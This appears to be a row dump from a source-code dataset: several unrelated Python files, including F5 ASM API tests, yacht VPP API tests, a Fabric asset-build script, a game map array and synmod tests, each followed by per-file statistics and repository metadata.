def test_create_mandatory_arg_missing(self, mgmt_root, set_policy):
reference = {'link': set_policy}
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
content = file_read()
file = tempfile.NamedTemporaryFile()
fh = open(file.name, 'w')
fh.write(content)
fh.close()
with pytest.raises(MissingRequiredCreationParameter) as err:
rc.import_vulnerabilities.create(
filename=file.name,
policyReference=reference
)
assert 'This resource requires at least one of the' in str(err.value)
def test_create_req_arg(self, import_vuln):
imp1 = import_vuln
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-vulnerabilities/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-vulnerabilities:import-vulnerabilities-taskstate'
assert imp1.importAllDomainNames is True
def test_refresh(self, import_vuln, mgmt_root):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
imp1 = import_vuln
imp2 = rc.import_vulnerabilities.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
assert imp1.importAllDomainNames == imp2.importAllDomainNames
imp1.refresh()
assert imp1.selfLink == imp2.selfLink
assert imp1.importAllDomainNames == imp2.importAllDomainNames
def test_load_no_object(self, mgmt_root):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
with pytest.raises(HTTPError) as err:
rc.import_vulnerabilities.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, mgmt_root, import_vuln):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
imp1 = import_vuln
imp2 = rc.import_vulnerabilities.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
assert imp1.importAllDomainNames == imp2.importAllDomainNames
def test_delete(self, mgmt_root, set_policy):
reference = {'link': set_policy}
imports = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
content = file_read()
file = tempfile.NamedTemporaryFile()
fh = open(file.name, 'w')
fh.write(content)
fh.close()
mgmt_root.tm.asm.file_transfer.uploads.upload_file(file.name)
task = imports.import_vulnerabilities.create(
filename=file.name,
policyReference=reference,
importAllDomainNames=True
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
hashid = str(task.id)
task.delete()
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
with pytest.raises(HTTPError) as err:
rc.import_vulnerabilities.load(id=hashid)
assert err.value.response.status_code == 404
def test_import_vuln_collection(self, mgmt_root, import_vuln):
imp1 = import_vuln
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-vulnerabilities/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-vulnerabilities:import-vulnerabilities-taskstate'
assert imp1.importAllDomainNames is True
sc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Import_Vulnerabilities)
| 36.189369 | 98 | 0.658557 | 4,083 | 32,679 | 5.103355 | 0.065148 | 0.048375 | 0.052311 | 0.040553 | 0.864184 | 0.854154 | 0.842684 | 0.82032 | 0.784134 | 0.779431 | 0 | 0.017976 | 0.235656 | 32,679 | 902 | 99 | 36.22949 | 0.816238 | 0.016892 | 0 | 0.731362 | 0 | 0 | 0.104976 | 0.038366 | 0 | 0 | 0 | 0 | 0.209512 | 1 | 0.092545 | false | 0 | 0.134961 | 0 | 0.237789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7551270451f7f94b2a01c04c1fbe6e3d0ec016ca | 5,633 | py | Python | test/testapi.py | sailingfree/Python-VPP | c4730494ae86dc78260ccd94fe05c85141760360 | [
"MIT"
] | 11 | 2020-06-03T15:06:03.000Z | 2022-02-05T19:01:33.000Z | test/testapi.py | sailingfree/Python-VPP | c4730494ae86dc78260ccd94fe05c85141760360 | [
"MIT"
] | 2 | 2020-06-03T15:24:51.000Z | 2020-10-24T21:21:28.000Z | test/testapi.py | sailingfree/Python-VPP | c4730494ae86dc78260ccd94fe05c85141760360 | [
"MIT"
] | 8 | 2020-06-07T18:28:34.000Z | 2021-08-20T16:55:29.000Z | import requests
import json
import os, sys
import numpy as np
sys.path.append(os.path.realpath("."))
from src.YachtMod import Yacht, Keel, Rudder
from src.SailMod import Main, Jib, Kite
from src.VPPMod import VPP
def test_interaction():
"""Test interaction between api and request by asking to sum arguments."""
url = "http://0.0.0.0:5000/api/sum/"
data = [
[14.34, 1.68, 2.7, 25.0, 98.0, 2.8, 1.31, 0.53, 2.7, 13.0, 0.57, 1.96, 660.0]
]
j_data = json.dumps(data)
headers = {"content-type": "application/json", "Accept-Charset": "UTF-8"}
r = requests.post(url, data=j_data, headers=headers)
print(r, r.text)
def test_local_vpp_solution():
"""
Return the dictionary produced by the VPP from an API call.
Pass the list of parameters as a dictionary.
Recieve the results as a dictionary.
"""
Keel1 = Keel(Cu=1.00, Cl=0.78, Span=1.90)
Rudder1 = Rudder(Cu=0.48, Cl=0.22, Span=1.15)
YD41 = Yacht(
Name="YD41",
Lwl=11.90,
Vol=6.05,
Bwl=3.18,
Tc=0.4,
WSA=28.20,
Tmax=2.30,
Amax=1.051,
Mass=6500,
Ff=1.5,
Fa=1.5,
Boa=4.2,
Loa=12.5,
App=[Keel1, Rudder1],
Sails=[
Main(P=16.60, E=5.60, Roach=0.1, BAD=1.0),
Jib(I=16.20, J=5.10, LPG=5.40, HBI=1.8),
Kite(area=150.0, vce=9.55),
],
)
yacht = dict(
{
"Name": "YD41",
"Lwl": 11.90,
"Vol": 6.05,
"Bwl": 3.18,
"Tc": 0.4,
"WSA": 28.20,
"Tmax": 2.30,
"Amax": 1.051,
"Mass": 6500,
"Ff": 1.5,
"Fa": 1.5,
"Boa": 4.2,
"Loa": 12.5,
}
)
keel = dict({"Cu": 1.00, "Cl": 0.78, "Span": 1.90})
rudder = dict({"Cu": 0.48, "Cl": 0.22, "Span": 1.15})
main = dict({"P": 16.60, "E": 5.60, "Roach": 0.1, "BAD": 1.0})
jib = dict({"I": 16.20, "J": 5.10, "LPG": 5.40, "HBI": 1.8})
kite = dict({"area": 150.0, "vce": 9.55})
tws_range = np.array([10.0]).tolist()
twa_range = [i for i in np.linspace(30.0, 180.0, 5)]
d = {
"name": yacht["Name"],
"yacht": yacht,
"keel": keel,
"rudder": rudder,
"main": main,
"jib": jib,
"kite": kite,
"tws_range": tws_range,
"twa_range": twa_range,
}
json_string = json.dumps(d)
url = "http://0.0.0.0:5000/api/vpp/"
headers = {"content-type": "application/json", "Accept-Charset": "UTF-8"}
response = requests.post(url, data=json_string, headers=headers).json()
vpp = VPP(Yacht=YD41)
vpp.set_analysis(
tws_range=np.array([10.0]), twa_range=np.linspace(30.0, 180.0, 5),
)
vpp.run(verbose=True)
results = vpp.result()
print(results["tws"] == response["tws"])
print(results["twa"] == response["twa"])
print(
np.isclose(results["perf"], response["perf"], rtol=0.1)
) # the results aren't always repeatable beyond 0.1 d.p.
def test_remote_vpp_solution():
"""
Return the dictionary produced by the VPP from an API call.
Pass the list of parameters as a dictionary.
Recieve the results as a dictionary.
"""
Keel1 = Keel(Cu=1.00, Cl=0.78, Span=1.90)
Rudder1 = Rudder(Cu=0.48, Cl=0.22, Span=1.15)
YD41 = Yacht(
Name="YD41",
Lwl=11.90,
Vol=6.05,
Bwl=3.18,
Tc=0.4,
WSA=28.20,
Tmax=2.30,
Amax=1.051,
Mass=6500,
Ff=1.5,
Fa=1.5,
Boa=4.2,
Loa=12.5,
App=[Keel1, Rudder1],
Sails=[
Main(P=16.60, E=5.60, Roach=0.1, BAD=1.0),
Jib(I=16.20, J=5.10, LPG=5.40, HBI=1.8),
Kite(area=150.0, vce=9.55),
],
)
yacht = dict(
{
"Name": "YD41",
"Lwl": 11.90,
"Vol": 6.05,
"Bwl": 3.18,
"Tc": 0.4,
"WSA": 28.20,
"Tmax": 2.30,
"Amax": 1.051,
"Mass": 6500,
"Ff": 1.5,
"Fa": 1.5,
"Boa": 4.2,
"Loa": 12.5,
}
)
keel = dict({"Cu": 1.00, "Cl": 0.78, "Span": 1.90})
rudder = dict({"Cu": 0.48, "Cl": 0.22, "Span": 1.15})
main = dict({"P": 16.60, "E": 5.60, "Roach": 0.1, "BAD": 1.0})
jib = dict({"I": 16.20, "J": 5.10, "LPG": 5.40, "HBI": 1.8})
kite = dict({"area": 150.0, "vce": 9.55})
tws_range = np.array([10.0]).tolist()
twa_range = [i for i in np.linspace(30.0, 180.0, 5)]
d = {
"name": yacht["Name"],
"yacht": yacht,
"keel": keel,
"rudder": rudder,
"main": main,
"jib": jib,
"kite": kite,
"tws_range": tws_range,
"twa_range": twa_range,
}
json_string = json.dumps(d)
url = "http://python-vpp-api.herokuapp.com/api/vpp/"
headers = {"content-type": "application/json", "Accept-Charset": "UTF-8"}
response = requests.post(url, data=json_string, headers=headers).json()
vpp = VPP(Yacht=YD41)
vpp.set_analysis(
tws_range=np.array([10.0]), twa_range=np.linspace(30.0, 180.0, 5),
)
vpp.run(verbose=True)
results = vpp.result()
print(results["tws"] == response["tws"])
print(results["twa"] == response["twa"])
print(
np.isclose(results["perf"], response["perf"], rtol=0.1)
) # the results aren't always repeatable beyond 0.1 d.p.
if __name__ == "__main__":
# test_interaction()
# test_local_vpp_solution()
test_remote_vpp_solution()
| 27.612745 | 85 | 0.499024 | 850 | 5,633 | 3.252941 | 0.201176 | 0.00868 | 0.00434 | 0.010127 | 0.83038 | 0.83038 | 0.83038 | 0.83038 | 0.820976 | 0.802893 | 0 | 0.12069 | 0.310137 | 5,633 | 203 | 86 | 27.748768 | 0.590839 | 0.090183 | 0 | 0.784431 | 0 | 0 | 0.113178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017964 | false | 0 | 0.041916 | 0 | 0.05988 | 0.041916 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f32e759f4045c5119734de5082dff62b6bb8d513 | 3,383 | py | Python | _blog_stuff/markdownplus/fabfile.py | draapho/Blog | 599ff2ec00a7fc17974df39db53d372e1697fe70 | [
"MIT"
] | 7 | 2016-11-13T19:08:00.000Z | 2020-03-27T04:38:25.000Z | _blog_stuff/markdownplus/fabfile.py | draapho/Blog | 599ff2ec00a7fc17974df39db53d372e1697fe70 | [
"MIT"
] | null | null | null | _blog_stuff/markdownplus/fabfile.py | draapho/Blog | 599ff2ec00a7fc17974df39db53d372e1697fe70 | [
"MIT"
] | 3 | 2018-05-17T05:47:17.000Z | 2021-02-18T08:19:05.000Z | from fabric.api import local
def css():
local('cp -r node_modules/markdown-core/dist/*.css dist/')
local('cp -r node_modules/markdown-core/dist/fonts dist/')
local('curl https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.min.css > dist/markdown-plus.css')
local('curl https://cdn.jsdelivr.net/jquery.layout/1.4.3/layout-default.css >> dist/markdown-plus.css')
local('curl https://cdnjs.cloudflare.com/ajax/libs/remodal/1.1.0/remodal.min.css >> dist/markdown-plus.css')
local('curl https://cdnjs.cloudflare.com/ajax/libs/remodal/1.1.0/remodal-default-theme.min.css >> dist/markdown-plus.css')
local('cat dist/markdown-core.min.css >> dist/markdown-plus.css')
local('rm dist/markdown-core.min.css')
local('cat markdown-plus.css >> dist/markdown-plus.css')
local('cleancss -o dist/markdown-plus.min.css dist/markdown-plus.css')
local('rm dist/markdown-plus.css')
def js():
local('curl https://cdn.jsdelivr.net/underscorejs/1.8.3/underscore-min.js > dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('cat node_modules/markdown-core/dist/markdown-core.min.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.min.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdn.jsdelivr.net/jquery.layout/1.4.3/jquery.layout.min.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/remodal/1.1.0/remodal.min.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/ace.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/keybinding-vim.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/keybinding-emacs.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/mode-markdown.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/ext-searchbox.js >> dist/markdown-plus.js')
for theme in ['tomorrow_night_eighties', 'tomorrow_night_blue', 'tomorrow', 'kuroir']:
local('echo "\n" >> dist/markdown-plus.js')
local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/theme-{0}.js >> dist/markdown-plus.js'.format(theme))
local('echo "\n" >> dist/markdown-plus.js')
local('cat sync_scroll.js >> dist/markdown-plus.js')
local('echo "\n" >> dist/markdown-plus.js')
local('cat markdown-plus.js >> dist/markdown-plus.js')
local('uglifyjs dist/markdown-plus.js -cmo dist/markdown-plus.min.js')
local('rm dist/markdown-plus.js')
def dist():
local('rm -rf node_modules')
local('npm install')
css()
js()
def mdp():
local('cp -rf dist ~/src/swift/markdown-plus/Markdown\ Plus/markdown-plus/')
local('cp -f index.html ~/src/swift/markdown-plus/Markdown\ Plus/markdown-plus/')
local('cp -f icon.png ~/src/swift/markdown-plus/Markdown\ Plus/markdown-plus/')
| 56.383333 | 126 | 0.683121 | 540 | 3,383 | 4.262963 | 0.15 | 0.250217 | 0.257168 | 0.211121 | 0.807124 | 0.754996 | 0.732407 | 0.706342 | 0.65682 | 0.631625 | 0 | 0.01502 | 0.114396 | 3,383 | 59 | 127 | 57.338983 | 0.753338 | 0 | 0 | 0.235294 | 0 | 0.352941 | 0.775643 | 0.325155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078431 | false | 0 | 0.019608 | 0 | 0.098039 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
f3c7e4cb5ec68e67de5cc67bcf6c26ca4ec02187 | 129 | py | Python | neurokit2/eeg/__init__.py | purpl3F0x/NeuroKit | bd41f2bf7692bc8ed4c85608daa535293a33a1d6 | [
"MIT"
] | 1 | 2020-05-26T09:46:57.000Z | 2020-05-26T09:46:57.000Z | neurokit2/eeg/__init__.py | purpl3F0x/NeuroKit | bd41f2bf7692bc8ed4c85608daa535293a33a1d6 | [
"MIT"
] | null | null | null | neurokit2/eeg/__init__.py | purpl3F0x/NeuroKit | bd41f2bf7692bc8ed4c85608daa535293a33a1d6 | [
"MIT"
] | 1 | 2020-10-27T06:47:51.000Z | 2020-10-27T06:47:51.000Z | """Submodule for NeuroKit."""
from .mne_channel_add import mne_channel_add
from .mne_channel_extract import mne_channel_extract
| 25.8 | 52 | 0.837209 | 19 | 129 | 5.263158 | 0.473684 | 0.4 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 129 | 4 | 53 | 32.25 | 0.854701 | 0.178295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f3c88a2395ad8886f4dec358684468d9b24bb235 | 71 | py | Python | other/dingding/dingtalk/api/__init__.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/__init__.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | other/dingding/dingtalk/api/__init__.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | from dingtalk.api.rest import *
from dingtalk.api.base import FileItem
| 23.666667 | 38 | 0.816901 | 11 | 71 | 5.272727 | 0.636364 | 0.413793 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112676 | 71 | 2 | 39 | 35.5 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
45f4ff0ebf88bd6baa930b21957a2a4776515857 | 1,700 | py | Python | examples/tower_defense/map_data.py | yuehaowang/pylash_engine | 338c1552ff55e1088534bc127cfc5aafbda61227 | [
"MIT"
] | 38 | 2015-09-12T15:09:51.000Z | 2021-08-12T10:49:28.000Z | examples/tower_defense/map_data.py | yuehaowang/pylash_engine | 338c1552ff55e1088534bc127cfc5aafbda61227 | [
"MIT"
] | 2 | 2021-03-12T07:03:14.000Z | 2021-11-17T11:29:23.000Z | examples/tower_defense/map_data.py | yuehaowang/pylash_engine | 338c1552ff55e1088534bc127cfc5aafbda61227 | [
"MIT"
] | 21 | 2016-03-15T02:18:37.000Z | 2021-03-02T06:41:16.000Z | mapImageList = [
[18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18],
[18, 18, 18, 18, 18, 19, 18, 18, 18, 18, 18, 18, 18, 18, 18],
[18, 18, 18, 18, 19, 19, 17, 17, 22, 23, 24, 17, 18, 18, 18],
[18, 18, 18, 19, 19, 17, 17, 17, 25, 26, 27, 17, 18, 18, 18],
[18, 18, 17, 17, 17, 17, 17, 17, 17, 16, 17, 17, 18, 18, 18],
[18, 17, 17, 17, 17, 17, 17, 17, 17, 16, 17, 17, 17, 18, 18],
[18, 16, 16, 16, 16, 17, 17, 17, 17, 16, 17, 17, 17, 17, 18],
[18, 16, 17, 17, 16, 16, 16, 17, 17, 16, 17, 17, 17, 17, 18],
[18, 16, 17, 17, 17, 17, 16, 17, 17, 16, 17, 17, 17, 17, 17],
[18, 16, 16, 16, 17, 17, 16, 16, 16, 16, 17, 17, 17, 17, 17],
[18, 17, 17, 16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18],
[18, 17, 17, 16, 16, 16, 16, 17, 17, 17, 17, 19, 19, 18, 18],
[18, 17, 17, 17, 17, 17, 16, 17, 17, 19, 19, 19, 18, 18, 18],
[18, 16, 16, 16, 16, 16, 16, 17, 17, 19, 19, 18, 18, 18, 18],
[18, 16, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18]
]
terrainList = [
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],
[2, 2, 2, 2, 2, 2, 0, 0, 2, 2, 2, 0, 2, 2, 2],
[2, 2, 2, 2, 2, 0, 0, 0, 2, 2, 2, 0, 2, 2, 2],
[2, 2, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 2, 2],
[2, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 2, 2],
[2, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 2],
[2, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 2],
[2, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[2, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0],
[2, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2],
[2, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 2, 2, 2, 2],
[2, 0, 0, 0, 0, 0, 1, 0, 0, 2, 2, 2, 2, 2, 2],
[2, 1, 1, 1, 1, 1, 1, 0, 0, 2, 2, 2, 2, 2, 2],
[2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]
] | 48.571429 | 62 | 0.410588 | 452 | 1,700 | 1.544248 | 0.033186 | 0.246418 | 0.309456 | 0.34957 | 0.946991 | 0.941261 | 0.881089 | 0.805158 | 0.679083 | 0.636103 | 0 | 0.556931 | 0.287059 | 1,700 | 35 | 63 | 48.571429 | 0.018977 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
340184320b631c1172079e7f62c07f907c1fb2c6 | 6,094 | py | Python | tests/test_master.py | Craven-Biostat-Lab/synmod | 433e2f1726e68acbc45f226b1235f15508156de1 | [
"MIT"
] | 1 | 2020-05-21T14:56:14.000Z | 2020-05-21T14:56:14.000Z | tests/test_master.py | Craven-Biostat-Lab/synmod | 433e2f1726e68acbc45f226b1235f15508156de1 | [
"MIT"
] | 3 | 2020-10-20T08:17:07.000Z | 2021-09-08T02:34:51.000Z | tests/test_master.py | Craven-Biostat-Lab/synmod | 433e2f1726e68acbc45f226b1235f15508156de1 | [
"MIT"
] | 1 | 2021-12-14T21:16:53.000Z | 2021-12-14T21:16:53.000Z | """Tests for master script"""
import json
import subprocess
import sys
from unittest.mock import patch
import cloudpickle
import numpy as np
import synmod
from synmod import master, constants
from tests.utils import pre_test, post_test, round_fp
# pylint: disable = invalid-name, redefined-outer-name, protected-access
def test_regressor1(tmpdir, caplog):
"""Test synthetic data generation"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type regressor -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.5 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
post_test(caplog, output_dir)
def test_subprocess1(tmpdir, caplog):
"""Test synthetic data generation"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type regressor -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.5 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
subprocess.check_call(cmd, shell=True)
post_test(caplog, output_dir)
def test_classifier1(tmpdir, caplog):
"""Test synthetic data generation"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.5 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
post_test(caplog, output_dir)
def test_reproducible_classifier(tmpdir, data_regression, caplog):
"""Reproducibility of results regression test"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
_, data, model = master.main()
post_test(caplog, output_dir)
labels = model.predict(data, labels=True)
data_regression.check(round_fp(data).tobytes() + labels.tobytes())
def test_reproducible_regressor(tmpdir, data_regression, caplog):
"""Reproducibility of results regression test"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type regressor -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
_, data, model = master.main()
post_test(caplog, output_dir)
labels = model.predict(data)
data_regression.check(round_fp(data).tobytes() + round_fp(labels).tobytes())
def test_reproducible_write_outputs(tmpdir, data_regression, file_regression, caplog):
"""Regression test to test reproducible human-readable summary of config/model/features and output files"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
f"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -write_outputs 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
data = np.load(f"{output_dir}/{constants.INSTANCES_FILENAME}")
post_test(caplog, output_dir)
with open(f"{output_dir}/{constants.SUMMARY_FILENAME}", "rb") as summary_file:
summary = json.load(summary_file)
file_regression.check(json.dumps(round_fp(summary), indent=2), extension=".json")
with open(f"{output_dir}/{constants.MODEL_FILENAME}", "rb") as model_file:
model = cloudpickle.load(model_file)
labels = model.predict(data, labels=True)
data_regression.check(round_fp(data).tobytes() + labels.tobytes())
def test_reproducible_standardize_features(tmpdir, data_regression, file_regression, caplog):
"""Regression test to test reproducibility with standardized features"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
cmd = ("python -m synmod -synthesis_type temporal -model_type classifier -num_instances 100 -num_features 10 -sequence_length 20 "
"-fraction_relevant_features 0.8 -include_interaction_only_features 1 -write_outputs 1 "
f"-standardize_features 1 -output_dir {output_dir} -seed {constants.SEED}")
pass_args = cmd.split()[2:]
with patch.object(sys, 'argv', pass_args):
master.main()
data = np.load(f"{output_dir}/{constants.INSTANCES_FILENAME}")
post_test(caplog, output_dir)
with open(f"{output_dir}/{constants.SUMMARY_FILENAME}", "rb") as summary_file:
summary = json.load(summary_file)
file_regression.check(json.dumps(round_fp(summary), indent=2), extension=".json")
with open(f"{output_dir}/{constants.MODEL_FILENAME}", "rb") as model_file:
model = cloudpickle.load(model_file)
labels = model.predict(data, labels=True)
data_regression.check(round_fp(data).tobytes() + labels.tobytes())
def test_interface(tmpdir, caplog):
"""Test API"""
output_dir = pre_test(sys._getframe().f_code.co_name, tmpdir, caplog)
_ = synmod.synthesize(output_dir=output_dir, num_features=2, num_instances=10, synthesis_type=constants.TEMPORAL, sequence_length=5)
| 52.534483 | 148 | 0.735478 | 834 | 6,094 | 5.111511 | 0.139089 | 0.078114 | 0.022519 | 0.030026 | 0.848464 | 0.840957 | 0.840957 | 0.82524 | 0.82524 | 0.82524 | 0 | 0.016959 | 0.148507 | 6,094 | 115 | 149 | 52.991304 | 0.804587 | 0.074171 | 0 | 0.724138 | 0 | 0.011494 | 0.357756 | 0.124017 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091954 | false | 0.137931 | 0.103448 | 0 | 0.195402 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
3416c3bea52a9895349d55551775c3351c880109 | 11,515 | py | Python | rdmo/questions/migrations/0007_refactoring.py | Raspeanut/rdmo | 9f785010a499c372a2f8368ccf76d2ea4150adcb | [
"Apache-2.0"
] | 77 | 2016-08-09T11:40:20.000Z | 2022-03-06T11:03:26.000Z | rdmo/questions/migrations/0007_refactoring.py | Raspeanut/rdmo | 9f785010a499c372a2f8368ccf76d2ea4150adcb | [
"Apache-2.0"
] | 377 | 2016-07-01T13:59:36.000Z | 2022-03-30T13:53:19.000Z | rdmo/questions/migrations/0007_refactoring.py | Raspeanut/rdmo | 9f785010a499c372a2f8368ccf76d2ea4150adcb | [
"Apache-2.0"
] | 47 | 2016-06-23T11:32:19.000Z | 2022-03-01T11:34:37.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-01-26 16:01
